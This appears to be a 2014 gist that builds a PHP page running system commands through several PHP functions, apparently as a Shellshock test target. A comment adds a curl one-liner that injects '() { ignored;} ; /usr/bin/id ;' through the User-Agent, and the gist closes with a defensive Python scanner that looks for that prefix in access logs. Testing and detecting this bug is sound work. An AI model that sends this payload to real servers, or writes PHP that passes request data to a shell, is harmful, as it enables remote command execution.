Next attempt at writing an exploitable PHP file.
<?php header("Content-Type: text/plain");?>
system("/usr/bin/id") => <?php system("/usr/bin/id"); ?>
shell_exec("/bin/hostname") => <?php echo shell_exec("/bin/hostname"); ?>
shell_exec("/bin/bash -c /bin/date") => <?php echo shell_exec("/bin/bash -c /bin/date"); ?>
exec("/usr/bin/whoami") => <?php echo exec("/usr/bin/whoami"); ?>
popen... => <?php
$fp = popen('/usr/bin/head /etc/issue 2>&1', "r");
// send the current file part to the browser
print fread($fp, 1024);
// flush the content to the browser
flush();
pclose($fp);
?>
shell_exec with HTTP_USER_AGENT => <?php
// defines a shell function named HTTP_USER_AGENT and then calls it
echo shell_exec("HTTP_USER_AGENT(){ /usr/bin/id; }; HTTP_USER_AGENT");
?>

@xambroz commented Sep 29, 2014

You need to export some variable as an environment variable for the shell to be executed.
This is my example of vulnerable PHP code:

/';"); ?>

This vulnerable code can be exploited by setting the user agent to something nasty like:
curl --user-agent '() { ignored;} ; /usr/bin/id ;'

Michal Ambroz
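
A defender-side check for the payload shape quoted in the comment above, as an added example that is not part of the gist or of the comment: it scans access-log lines in Apache/nginx combined format for the `() {` function-definition prefix in the request line, Referer or User-Agent. The log lines, the `/test.php` path and the names `scan`, `COMBINED` and `FUNC_PREFIX` are constructed for illustration.

```python
import re

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
# Quoted fields may contain backslash-escaped characters (e.g. \" written by the server).
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"\s*$'
)

# The payload on this page starts with "() {", the form in which a shell function
# is passed through an environment variable. Whitespace variants and matches
# anywhere in the field are flagged too, so that hits are reviewed rather than missed.
FUNC_PREFIX = re.compile(r'\(\s*\)\s*\{')

# Constructed sample input (documentation IP range, made-up path).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Sep/2014:10:00:01 +0000] "GET /test.php HTTP/1.1" 200 312 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.44 - - [29/Sep/2014:10:00:07 +0000] "GET /test.php HTTP/1.1" 200 298 "-" "() { ignored;} ; /usr/bin/id ;"',
    '192.0.2.45 - - [29/Sep/2014:10:00:09 +0000] "GET /test.php HTTP/1.1" 200 298 "() { ignored;} ; /bin/hostname ;" "curl/7.38.0"',
    'not a combined-format line',
]


def scan(lines):
    """Return (hits, unparsed).

    hits:     list of (line_number, client_ip, field_name) for every
              client-controlled field that contains the function prefix.
    unparsed: line numbers that did not match the log format, so that
              malformed entries are reported instead of silently skipped.
    """
    hits, unparsed = [], []
    for number, line in enumerate(lines, 1):
        match = COMBINED.match(line)
        if match is None:
            unparsed.append(number)
            continue
        for field in ("request", "referer", "agent"):
            if FUNC_PREFIX.search(match.group(field)):
                hits.append((number, match.group("ip"), field))
    return hits, unparsed


if __name__ == "__main__":
    found, skipped = scan(SAMPLE_LOG)
    for number, ip, field in found:
        print(f"line {number}: {ip} sent a function-definition prefix in {field}")
    print("unparsed lines:", skipped)
```

Only fields that reach the access log are covered; other request headers need a log format that records them.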
